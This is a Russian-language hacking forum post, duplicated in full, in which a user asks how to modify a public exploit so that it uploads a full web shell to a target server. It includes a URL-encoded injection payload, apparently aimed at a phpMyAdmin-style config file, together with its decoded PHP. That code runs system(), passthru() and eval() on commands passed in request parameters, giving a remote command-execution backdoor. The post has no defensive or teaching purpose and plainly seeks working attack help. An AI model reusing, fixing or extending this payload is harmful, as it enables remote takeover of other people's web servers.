Bigmanhlo
04.07.2011, 11:59
Вообщем суть такова. Вот сплойт http://www.exploit-db.com/download/8921/.
По сути мне нужно сделать так чтобы, чтобы этот эксплойт мне залил полноценный шелл. Но столкнулся с рядом проблемм.
Вот шифрованный код.
PHP:
%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre% 3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3 c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3c pre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:% 22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_ type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4: %22root%22%3b}}}
Вот рассшифрованный
PHP:
'; if($_GET['c']){echo '';system($_GET['c']);echo '';}if($_GET['p']){echo '';eval($_GET['p']);echo '';};//'] ='localhost';
Но даже для примера просто пробую поменять в коде passthru вместо system. И сплойт не пишет пхп код в конфиг. Хоть что, изменяешь в коде, он перестаёт писать в конфиг, даже простой метод в место GET, ставлю POST. И уже мой пхп код, не пишеться в конфиг.
PHP:
%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre% 3e%27%3bpassthru(\$_GET%5b%27c%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3c pre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:% 22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_ type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4: %22root%22%3b}}}
Что мне конкретно надо? Чтобы вшить в сплойт полноценный шелл, и он мне залил его. Но я не могу понять толи какие то ограничения по символам толи что, подсказывайте . Другие сплойты не предлагать, запись в конфиг есть, но мне надо конретно сделать тот вопрос, о котором спросил, других альтернатих не предлагайте, нужно именно этот пример. Спасибо
По сути мне нужно сделать так чтобы, чтобы этот эксплойт мне залил полноценный шелл. Но столкнулся с рядом проблемм.
Вот шифрованный код.
PHP:
%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre% 3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3 c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3c pre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:% 22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_ type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4: %22root%22%3b}}}
Вот рассшифрованный
PHP:
'; if($_GET['c']){echo '';system($_GET['c']);echo '';}if($_GET['p']){echo '';eval($_GET['p']);echo '';};//'] ='localhost';
Но даже для примера просто пробую поменять в коде passthru вместо system. И сплойт не пишет пхп код в конфиг. Хоть что, изменяешь в коде, он перестаёт писать в конфиг, даже простой метод в место GET, ставлю POST. И уже мой пхп код, не пишеться в конфиг.
PHP:
%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre% 3e%27%3bpassthru(\$_GET%5b%27c%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3c pre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27 %3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:% 22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_ type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4: %22root%22%3b}}}
Что мне конкретно надо? Чтобы вшить в сплойт полноценный шелл, и он мне залил его. Но я не могу понять толи какие то ограничения по символам толи что, подсказывайте . Другие сплойты не предлагать, запись в конфиг есть, но мне надо конретно сделать тот вопрос, о котором спросил, других альтернатих не предлагайте, нужно именно этот пример. Спасибо